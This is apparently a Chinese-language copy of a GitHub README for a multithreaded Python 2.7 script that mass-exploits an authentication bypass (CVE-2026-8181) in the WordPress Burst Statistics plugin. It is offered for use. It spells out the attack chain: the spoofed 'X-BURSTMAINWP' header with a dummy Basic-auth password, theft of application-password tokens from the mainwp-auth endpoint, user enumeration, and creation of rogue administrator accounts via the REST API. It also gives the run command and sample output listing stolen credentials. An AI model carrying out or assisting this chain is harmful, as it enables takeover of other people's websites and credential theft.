Jenderal92/CVE-2026-8181
GitHub: Jenderal92/CVE-2026-8181
针对 WordPress Burst Statistics 插件身份验证绕过漏洞的批量利用脚本,可自动化完成从用户枚举到管理员账户创建的完整攻击链。
Stars: 0 | Forks: 0
# CVE-2026-8181 - Burst Statistics 身份验证绕过漏洞利用
针对 Burst Statistics 插件漏洞 (CVE-2026-8181) 的 **Python 2.7** 漏洞利用程序。该漏洞允许未经身份验证的攻击者绕过 REST API 身份验证,获取应用密码,并在存在漏洞的 WordPress 站点上创建新的管理员用户。
## 漏洞概述
CVE-2026-8181 影响 WordPress 的 Burst Statistics 插件(补丁发布之前的版本)。该缺陷存在于 REST API 身份验证机制中,允许攻击者:
- 通过发送特制的 `X-BURSTMAINWP` 请求头绕过身份验证
- 通过 `/burst/v1/mainwp-auth` 端点获取应用密码
- 通过 WordPress REST API 执行特权操作(列出用户、读取设置、创建新的管理员账户)
## 功能
- 多线程扫描(默认 10 个线程)
- 自动检测 WordPress 基础路径 (`/`, `/wordpress`, `/wp`)
- 通过 `/wp-json/wp/v2/users` 或作者 ID 重定向进行用户名枚举
- 利用身份验证绕过漏洞以:
- 获取应用密码(Base64 编码的 token)
- 验证对敏感 REST 端点(设置、插件、管理员用户)的访问权限
- 使用随机凭据创建新的管理员用户
- 将成功的结果保存到 `res.txt`
## 环境要求
- **Python 2.7**(已弃用,但本脚本需要)
- `requests` 库
```
pip install requests
```
## 使用说明
1. 准备一个目标列表文件(每行一个域名或 IP,带或不带 `http://`/`https://` 均可)。
示例 `targets.txt`:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
2. 运行漏洞利用程序:
```
python2 CVE-2026-8181.py targets.txt
```
3. 结果将保存在当前目录的 `res.txt` 中。
### 命令行选项
| 参数 | 描述 |
|--------------|--------------------------------------|
| `list.txt` | 包含目标 URL 的文件路径 |
### 示例输出
```
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res.txt
```
## 输出文件格式 (`res.txt`)
对于每个存在漏洞的目标,脚本会追加写入:
```
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
```
## 工作原理
1. **目标准备** – 如果缺少 `http://` 前缀则添加,去除末尾的斜杠。
2. **路径迭代** – 尝试将 `/`、`/wordpress` 和 `/wp` 作为 WordPress 基础目录。
3. **用户名枚举** – 获取 `/wp-json/wp/v2/users` 或使用 `?author=N` 重定向。
4. **绕过测试** – 发送 `X-BURSTMAINWP: 1` + 使用用户名和虚拟密码 (`CVE-2026-8181`) 进行 Basic 认证。如果端点 `/wp-json/wp/v2/users/me?context=edit` 返回 200,则该站点存在漏洞。
5. **漏洞利用** –
- 请求 `/wp-json/burst/v1/mainwp-auth` 以获取应用密码 token。
- 验证对 `/settings`、`/plugins`、`/users` 的访问权限。
- 通过 `POST /wp-json/wp/v2/users` 创建新的管理员账户。
6. **结果保存** – 将所有获取到的凭据写入 `res.txt`。
## 自定义
您可以修改脚本内的以下变量:
- `THREADS` – 并发线程数(默认 10)
- `BASE_PATHS` – 要检查的额外 WordPress 子目录
- `requests` 的超时值
## 注意事项
- 本脚本使用 Python 2.7 – 请确保已安装,或考虑将其移植到 Python 3。
- 为简单起见,已禁用 SSL 证书验证 (`verify=False`)。
- 本漏洞利用程序依赖于 Burst Statistics 插件处于活动状态且未打补丁。
## 许可证
本项目仅供教育目的使用。使用风险自负。
## 参考文献
- [CVE-2026-8181 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-8181) (假设的)
- Burst Statistics 插件(受影响的版本)
标签:Burst Statistics, CISA项目, CVE-2026-8181, Python 2.7, REST API接管, SEO词: WordPress Exploit, Web安全, Web报告查看器, WordPress插件漏洞, 协议分析, 多线程扫描, 应用密码窃取, 未授权访问, 权限提升, 漏洞利用脚本(Exploit), 管理员账户创建, 自动化渗透测试, 蓝队分析, 身份验证绕过